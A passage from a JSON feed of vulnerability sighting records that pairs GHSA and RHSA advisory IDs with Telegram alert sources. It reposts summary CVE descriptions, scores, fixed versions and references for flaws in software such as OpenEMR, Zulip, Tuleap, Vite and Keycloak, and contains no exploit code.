cluster and compromise its security. This vulnerability is fixed in 4.8.0 and 3.10.18.\n\ud83d\udccf Published: 2025-03-31T15:08:20.942Z\n\ud83d\udccf Modified: 2025-03-31T15:08:20.942Z\n\ud83d\udd17 References:\n1. https://github.com/jumpserver/jumpserver/security/advisories/GHSA-5q9w-f4wh-f535", "creation_timestamp": "2025-03-31T15:31:18.000000Z"}, {"uuid": "197092fb-0161-4e8c-8250-db0e5c5e4d63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0421", "type": "seen", "source": "Telegram/bfwzVOsJpKBGXVGbU-fAyqvN9ntDEQLmDKUbUw5_xZxXiao", "content": "", "creation_timestamp": "2026-01-12T04:00:54.000000Z"}, {"uuid": "1657e0ea-da2e-41aa-b888-af8987703b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0422", "type": "seen", "source": "Telegram/bfwzVOsJpKBGXVGbU-fAyqvN9ntDEQLmDKUbUw5_xZxXiao", "content": "", "creation_timestamp": "2026-01-12T04:00:54.000000Z"}, {"uuid": "9c58cf81-118f-4874-9486-c9acd6342d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XR5-QPPJ-GVWJ", "type": "published-proof-of-concept", "source": "Telegram/L_WVspxRTrJFt0gaPmkH0JQuuFs1kcFuqZTB9DZyjlzuG3g", "content": "", "creation_timestamp": "2026-01-09T21:05:13.000000Z"}, {"uuid": "e71e7d1e-b874-48b1-aa5e-714ab57d898a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H96M-RVF9-JGM2", "type": "published-proof-of-concept", "source": "Telegram/L_WVspxRTrJFt0gaPmkH0JQuuFs1kcFuqZTB9DZyjlzuG3g", "content": "", "creation_timestamp": "2026-01-09T21:05:13.000000Z"}, {"uuid": "865bf77c-de39-425d-bb7e-5f6065028fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVR3-FJHH-CFWC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9379", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30211\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.1, 26.2.5.10, and 25.3.2.19, a maliciously formed KEX init message can result with high memory usage. Implementation does not verify RFC specified limits on algorithm names (64 characters) provided in KEX init message. Big KEX init packet may lead to inefficient processing of the error data. As a result, large amount of memory will be allocated for processing malicious data. Versions OTP-27.3.1, OTP-26.2.5.10, and OTP-25.3.2.19 fix the issue. Some workarounds are available. One may set option `parallel_login` to `false` and/or reduce the `max_sessions` option.\n\ud83d\udccf Published: 2025-03-28T14:55:47.778Z\n\ud83d\udccf Modified: 2025-03-28T15:10:37.128Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-vvr3-fjhh-cfwc", "creation_timestamp": "2025-03-28T15:28:54.000000Z"}, {"uuid": "05b2185b-64d4-4272-8a73-cbe60d41eeba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95J3-435G-VJCP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9483", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-28254\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Cross Site Scripting vulnerability in Leantime v3.2.1 and before allows an authenticated attacker to execute arbitrary code and obtain sensitive information via the first name field in processMentions().\n\ud83d\udccf Published: 2025-03-28T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-28T20:35:19.395Z\n\ud83d\udd17 References:\n1. https://github.com/Leantime/leantime/blob/0e7ddbbe3d582f657a1dddfef7b3419ae588cbf7/app/Domain/Notifications/Services/Notifications.php#L128\n2. https://github.com/Leantime/leantime/commit/ce1d2073e4601183e1bdd90f4b433d16aee46a50\n3. https://github.com/Leantime/leantime/security/advisories/GHSA-95j3-435g-vjcp", "creation_timestamp": "2025-03-28T21:29:18.000000Z"}, {"uuid": "fd85ec09-9e18-4a4c-b3c9-bab2d89dfea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1868", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "4ab0c952-7a2e-4611-8ee6-315897a86177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1867", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "6be92d5d-0096-444a-9d30-a853796e1a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93X5-PRX9-X239", "type": "published-proof-of-concept", "source": "Telegram/Nl1nJ7oKFP_gxJQcjsLBwT7qdFTbkUrNVanLI6gM4hULEEs", "content": "", "creation_timestamp": "2026-01-10T03:02:22.000000Z"}, {"uuid": "4d34b6fe-f4fd-4ef5-811c-cd7a8d9e17c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VRV-7H26-C7JC", "type": "published-proof-of-concept", "source": "Telegram/Nl1nJ7oKFP_gxJQcjsLBwT7qdFTbkUrNVanLI6gM4hULEEs", "content": "", "creation_timestamp": "2026-01-10T03:02:22.000000Z"}, {"uuid": "7628bbc1-7692-49c2-b366-486bac3924f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M8F2-CWPQ-VVHH", "type": "published-proof-of-concept", "source": "Telegram/Nl1nJ7oKFP_gxJQcjsLBwT7qdFTbkUrNVanLI6gM4hULEEs", "content": "", "creation_timestamp": "2026-01-10T03:02:22.000000Z"}, {"uuid": "8f6be8d6-c1fc-45ac-924a-4d75e210571e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89GP-G4C9-HV8H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9700", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29772\n\ud83d\udd25 CVSS Score: 7.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. The POST parameter hidden_subcategory is output to the page without being properly processed. This leads to a reflected cross-site scripting (XSS) vul;nerability in CAMOS new.php. This vulnerability is fixed in 7.0.3.\n\ud83d\udccf Published: 2025-03-31T16:03:32.711Z\n\ud83d\udccf Modified: 2025-03-31T16:03:32.711Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-89gp-g4c9-hv8h\n2. https://github.com/openemr/openemr/commit/17c5c424695de50db94f2c01fb9abfc441d09a1a", "creation_timestamp": "2025-03-31T16:33:27.000000Z"}, {"uuid": "b8ad4229-30a4-439a-b5b4-5b0450d1b231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J42-H78H-Q4FG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9693", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30223\n\ud83d\udd25 CVSS Score: 9.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)\n\ud83d\udd39 Description: Beego is an open-source web framework for the Go programming language. Prior to 2.3.6, a Cross-Site Scripting (XSS) vulnerability exists in Beego's RenderForm() function due to improper HTML escaping of user-controlled data. This vulnerability allows attackers to inject malicious JavaScript code that executes in victims' browsers, potentially leading to session hijacking, credential theft, or account takeover. The vulnerability affects any application using Beego's RenderForm() function with user-provided data. Since it is a high-level function generating an entire form markup, many developers would assume it automatically escapes attributes (the way most frameworks do). This vulnerability is fixed in 2.3.6.\n\ud83d\udccf Published: 2025-03-31T16:17:05.914Z\n\ud83d\udccf Modified: 2025-03-31T16:17:05.914Z\n\ud83d\udd17 References:\n1. https://github.com/beego/beego/security/advisories/GHSA-2j42-h78h-q4fg\n2. https://github.com/beego/beego/commit/939bb18c66406466715ddadd25dd9ffa6f169e25", "creation_timestamp": "2025-03-31T16:33:14.000000Z"}, {"uuid": "b2d7eb64-ee96-4aca-b6e0-f2687c07cc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q7QP-P3VW-J2FH", "type": "published-proof-of-concept", "source": "Telegram/Nl1nJ7oKFP_gxJQcjsLBwT7qdFTbkUrNVanLI6gM4hULEEs", "content": "", "creation_timestamp": "2026-01-10T03:02:22.000000Z"}, {"uuid": "a25835f1-82c1-4104-8f31-da4fe6c29c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4R4M-QW57-CHR8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9702", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31125\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&amp;import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.\n\ud83d\udccf Published: 2025-03-31T17:06:30.704Z\n\ud83d\udccf Modified: 2025-03-31T17:06:30.704Z\n\ud83d\udd17 References:\n1. https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8\n2. https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949", "creation_timestamp": "2025-03-31T17:30:49.000000Z"}, {"uuid": "66eca40e-2502-451a-9f4a-cb8132ee3367", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4RM-MM56-XF63", "type": "seen", "source": "Telegram/S2KXutw1drBgRs_xEuEIjByNvXPd-WruEjV0wL9OdN7BsNk", "content": "", "creation_timestamp": "2026-01-10T03:02:28.000000Z"}, {"uuid": "b6e106b8-fa58-4363-a3c1-b98a504d2a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PVV-PH3X-2F9H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9708", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31117\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. An Out-of-Band Server-Side Request Forgery (OOB SSRF) vulnerability was identified in OpenEMR, allowing an attacker to force the server to make unauthorized requests to external or internal resources. this attack does not return a direct response but can be exploited through DNS or HTTP interactions to exfiltrate sensitive information. This vulnerability is fixed in 7.0.3.1.\n\ud83d\udccf Published: 2025-03-31T16:49:14.739Z\n\ud83d\udccf Modified: 2025-03-31T16:49:14.739Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-2pvv-ph3x-2f9h\n2. https://github.com/openemr/openemr/commit/aa6f50efb2971285633fa77ea7a50949408cab12", "creation_timestamp": "2025-03-31T17:30:57.000000Z"}, {"uuid": "6c5b66ba-3508-4287-bd59-51e27586e202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5HVC-6WX8-MVV4", "type": "seen", "source": "Telegram/S2KXutw1drBgRs_xEuEIjByNvXPd-WruEjV0wL9OdN7BsNk", "content": "", "creation_timestamp": "2026-01-10T03:02:28.000000Z"}, {"uuid": "6e9c7bdb-3466-432c-8377-b810bea23508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCGX-Q63F-7GW4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9719", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30369\n\ud83d\udd25 CVSS Score: 2.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Zulip is an open-source team collaboration tool. The API for deleting an organization custom profile field is supposed to be restricted to organization administrators, but its handler failed to check that the field belongs to the same organization as the user. Therefore, an administrator of any organization was incorrectly allowed to delete custom profile fields belonging to a different organization. This is fixed in Zulip Server 10.1.\n\ud83d\udccf Published: 2025-03-31T16:32:54.301Z\n\ud83d\udccf Modified: 2025-03-31T16:32:54.301Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-fcgx-q63f-7gw4", "creation_timestamp": "2025-03-31T17:31:13.000000Z"}, {"uuid": "33072f8c-de23-482f-a14c-8aae8926031b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCFQ-M8P6-GW56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9716", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31116\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:L)\n\ud83d\udd39 Description: Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. The mitigation for CVE-2024-29190 in valid_host() uses socket.gethostbyname(), which is vulnerable to SSRF abuse using DNS rebinding technique. This vulnerability is fixed in 4.3.2.\n\ud83d\udccf Published: 2025-03-31T16:42:42.618Z\n\ud83d\udccf Modified: 2025-03-31T16:43:13.602Z\n\ud83d\udd17 References:\n1. https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-fcfq-m8p6-gw56\n2. https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/4b8bab5a9858c69fe13be4631b82d82186e0d3bd", "creation_timestamp": "2025-03-31T17:31:08.000000Z"}, {"uuid": "7e195729-e5c4-4039-9dfe-ac1b3f102a8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P523-JQ9W-64X9", "type": "seen", "source": "Telegram/S2KXutw1drBgRs_xEuEIjByNvXPd-WruEjV0wL9OdN7BsNk", "content": "", "creation_timestamp": "2026-01-10T03:02:28.000000Z"}, {"uuid": "f848ee59-002d-4cd1-b9a2-b52a3f986a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8QC-XP3G-C458", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9957", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30224\n\ud83d\udd25 CVSS Score: 5.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: MyDumper is a MySQL Logical Backup Tool. The MySQL C client library (libmysqlclient) allows authenticated remote actors to read arbitrary files from client systems via a crafted server response to LOAD LOCAL INFILE query, leading to sensitive information disclosure when clients connect to untrusted MySQL servers without explicitly disabling the local infile capability. Mydumper has the local infile option enabled by default and does not have an option to disable it. This can lead to an unexpected arbitrary file read if the Mydumper tool connects to an untrusted server. This vulnerability is fixed in 0.18.2-8.\n\ud83d\udccf Published: 2025-04-01T14:38:43.253Z\n\ud83d\udccf Modified: 2025-04-01T17:18:52.450Z\n\ud83d\udd17 References:\n1. https://github.com/mydumper/mydumper/security/advisories/GHSA-r8qc-xp3g-c458", "creation_timestamp": "2025-04-01T17:32:37.000000Z"}, {"uuid": "f5af4e6a-52e3-42df-b6cf-5c284c78bc36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5QQ-MVFM-J35X", "type": "seen", "source": "Telegram/S2KXutw1drBgRs_xEuEIjByNvXPd-WruEjV0wL9OdN7BsNk", "content": "", "creation_timestamp": "2026-01-10T03:02:28.000000Z"}, {"uuid": "55d1c831-d79d-49ed-af87-fa7554f146e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-H5HC-X8CW", "type": "seen", "source": "Telegram/hIscdD1HJtLSg0SDRbuSjzrqCFMwM_v_5SX0wjW8Bk7vM6o", "content": "", "creation_timestamp": "2026-01-10T04:02:20.000000Z"}, {"uuid": "53e314f5-734f-424d-8c0d-af6ef6573bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2W69-QVJG-HVJX", "type": "seen", "source": "Telegram/hIscdD1HJtLSg0SDRbuSjzrqCFMwM_v_5SX0wjW8Bk7vM6o", "content": "", "creation_timestamp": "2026-01-10T04:02:20.000000Z"}, {"uuid": "580c4828-7b64-4d89-b192-cb0d2c70f7a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCP5-PMPM-MGWH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9737", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30209\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. An attacker can access release notes content or information via the FRS REST endpoints it should not have access to. This vulnerability is fixed in Tuleap Community Edition 16.5.99.1742812323 and Tuleap Enterprise Edition 16.5-6 and 16.4-10.\n\ud83d\udccf Published: 2025-03-31T15:53:46.455Z\n\ud83d\udccf Modified: 2025-03-31T18:19:35.993Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-hcp5-pmpm-mgwh\n2. https://github.com/Enalean/tuleap/commit/34af2d5d10b0349967129f53427f495815e5bbcc\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=34af2d5d10b0349967129f53427f495815e5bbcc\n4. https://tuleap.net/plugins/tracker/?aid=42251", "creation_timestamp": "2025-03-31T18:32:18.000000Z"}, {"uuid": "c93d2610-d31e-4925-8165-79ba9fd49b7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HR4-H6PX-7PPG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9740", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30155\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap does not enforce read permissions on parent trackers in the REST API. This vulnerability is fixed in Tuleap Community Edition 16.5.99.1742392651 and Tuleap Enterprise Edition 16.5-5 and 16.4-8.\n\ud83d\udccf Published: 2025-03-31T15:58:30.058Z\n\ud83d\udccf Modified: 2025-03-31T18:18:13.265Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-6hr4-h6px-7ppg\n2. https://github.com/Enalean/tuleap/commit/0921df3a1c1aa20fc359b373f001a77c43b1b726\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=0921df3a1c1aa20fc359b373f001a77c43b1b726\n4. https://tuleap.net/plugins/tracker/?aid=42237", "creation_timestamp": "2025-03-31T18:32:21.000000Z"}, {"uuid": "507da2e9-2c36-4f84-8018-79727058d75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GR7W-HMCH-25G7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9748", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31128\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: gifplayer is a customizable jquery plugin to play and stop animated gifs. gifplayer contains a cross-site scripting (XSS) vulnerability. This vulnerability is fixed in 0.3.7.\n\ud83d\udccf Published: 2025-03-31T18:47:32.369Z\n\ud83d\udccf Modified: 2025-03-31T18:47:32.369Z\n\ud83d\udd17 References:\n1. https://github.com/rubentd/gifplayer/security/advisories/GHSA-gr7w-hmch-25g7\n2. https://github.com/rubentd/gifplayer/commit/2966193d4d066e5a6ba09dbdf1e1c7f8238630c8", "creation_timestamp": "2025-03-31T19:31:10.000000Z"}, {"uuid": "bbac02f8-b21d-4c0a-9856-0bacdf662065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMHR-5FFQ-QCRC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9746", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30368\n\ud83d\udd25 CVSS Score: 2.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Zulip is an open-source team collaboration tool. The API for deleting an organization export is supposed to be restricted to organization administrators, but its handler failed to check that the field belongs to the same organization as the user. Therefore, an administrator of any organization was incorrectly allowed to delete an export of a different organization. This is fixed in Zulip Server 10.1.\n\ud83d\udccf Published: 2025-03-31T16:26:48.673Z\n\ud83d\udccf Modified: 2025-03-31T18:59:32.854Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-rmhr-5ffq-qcrc\n2. https://github.com/zulip/zulip/commit/07dcee36b2a34d63429d7a706f880628cf3433df\n3. https://zulip.readthedocs.io/en/latest/overview/changelog.html#zulip-server-10-1", "creation_timestamp": "2025-03-31T19:31:09.000000Z"}, {"uuid": "4f969ad5-6290-4fd2-ba60-688f32570d8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7C5V-895V-W4Q5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9744", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31129\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Jooby is a web framework for Java and Kotlin. The pac4j io.jooby.internal.pac4j.SessionStoreImpl#get module deserializes untrusted data. This vulnerability is fixed in 2.17.0 (2.x) and 3.7.0 (3.x).\n\ud83d\udccf Published: 2025-03-31T19:10:57.599Z\n\ud83d\udccf Modified: 2025-03-31T19:10:57.599Z\n\ud83d\udd17 References:\n1. https://github.com/jooby-project/jooby/security/advisories/GHSA-7c5v-895v-w4q5\n2. https://github.com/jooby-project/jooby/commit/3e13562cf36d7407813eae464e0f4b598de15692\n3. https://github.com/jooby-project/jooby/blob/v2.x/modules/jooby-pac4j/src/main/java/io/jooby/internal/pac4j/SessionStoreImpl.java#L39-L45\n4. https://github.com/jooby-project/jooby/blob/v3.6.1/modules/jooby-pac4j/src/main/java/io/jooby/internal/pac4j/SessionStoreImpl.java#L77-L84", "creation_timestamp": "2025-03-31T19:31:03.000000Z"}, {"uuid": "f71476a2-074c-48a2-ade8-b7ea1b24b1f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQQC-JR88-P6X2", "type": "published-proof-of-concept", "source": 